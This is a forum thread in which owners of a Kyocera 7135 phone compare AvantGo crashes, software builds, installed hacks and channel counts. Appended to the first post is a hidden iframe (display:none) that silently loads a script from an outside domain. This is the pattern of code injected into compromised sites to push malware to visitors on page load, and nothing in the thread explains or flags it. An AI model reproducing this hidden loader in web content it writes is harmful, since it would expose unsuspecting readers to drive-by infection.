AvantGo crashes 7135

Has anyone else had problems running AvantGo on their 7135? I used AvantGo when I had a 6035 and never had any problems. But with my 7135 I crash every time.

I have downloaded the latest version of AvantGo. I have no problems using other browsers; e.g. Blazer, EIS, etc.

Any input would be appreciated
Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Me Too

I have similar issues, though not all the time. Adding/Removing channels is the worst, but even without that it causes a Fatal Reset at least once a day. Still it is worth it for the functionalIty

I have no problems at all with version 4.2 Build 1165 of AvantGo on my 7135. Are you running any hacks that could cause the problem???

AvantGo crashes everything IMO.

I don't even use it anymore.

I haven't had any problems with it crashing my 7135, but I don't have many channels selected on it. I have noticed that Avantgo has been "down" for maintenance a couple of times lately though.

I believe that it isn't compatible with Mac OSX. I've tried with no success. I thought I saw a link on their website that said this.

This comes from Avantgo's site!

I found this on the Avantgo site as well.

I was right and it doesn't work on Microsoft smartphones either!

I looked at the AvantGo site last night planning to download the latest version for the wireless support. I got the impression that the new version required Palm OS 4.2 -- we only have 4.1 right?

I have about 5 newspapers that I dl daily and "yes" the 7135 crashes on me every couple of days. AVANTGO is the only 3rd party sw that I use on my 7135. Hope they fix this soon cause I can't live without it. "Yes" -I can't live without it.

Folks,

I am using 4.2 Build 1165, and I have not had a single problem with Avant Go. I have been using the phone since December of last year.

I also use AvantGo as my favorite online web browser. It is faster and better at formatting than all the rest.

Eudora web works good for text reading, and the supplied browser (EIS web) seems cool but it is too slow on the 7135 to make it useful.

I hope not

I have the Palm 4.1 ware on my phone and have been avidly using AVantgo without problems over the past couple days. I hope I don't see all the crashes you have been seeing but will report back if so.

Channels?

Pete L - You using many Channels?

Do you have Hacks loaded on your 7135?

Do you have many 3rd party programs running?

===
My 7135 is running perfectly and I would like to try this program out - but don't want to cause myself problems - I've never used Web Clipping so at this point I can live without it!

As I mentioned in a previous post, I have AvantGo v4.2 Build 1165 on my 7135, and it runs with no problems. Hacks and system changing type stuff I have loaded are as follows:

QuickBits v1.1 (standalone app)

MiddleCapsHack (X-Master)
ScrollHack (X-Master) - this is for horizontal scrolling in AvantGo via the two right hard keys. Search for it on PalmGear.com for more info.
Keyboard Hack (X-Master)

AvantGo is fine here....

I shelled out for an 8mb account a few months ago. I currently have 50 channels installed. My AG version is 4.2 Build 1165. This is the same version I had on my 6035 and it was installed onto my 7135 when I switched phones. Never had a crash or instability issue with it on either phone. I didn't even know it was giving others problems until I came across this thread.

I chose Palm OS as my device and downloaded the software that popped up...How do I know what Build it is? Is it automatically Build 1165? If not, how do I find Built 1165.
Thanks
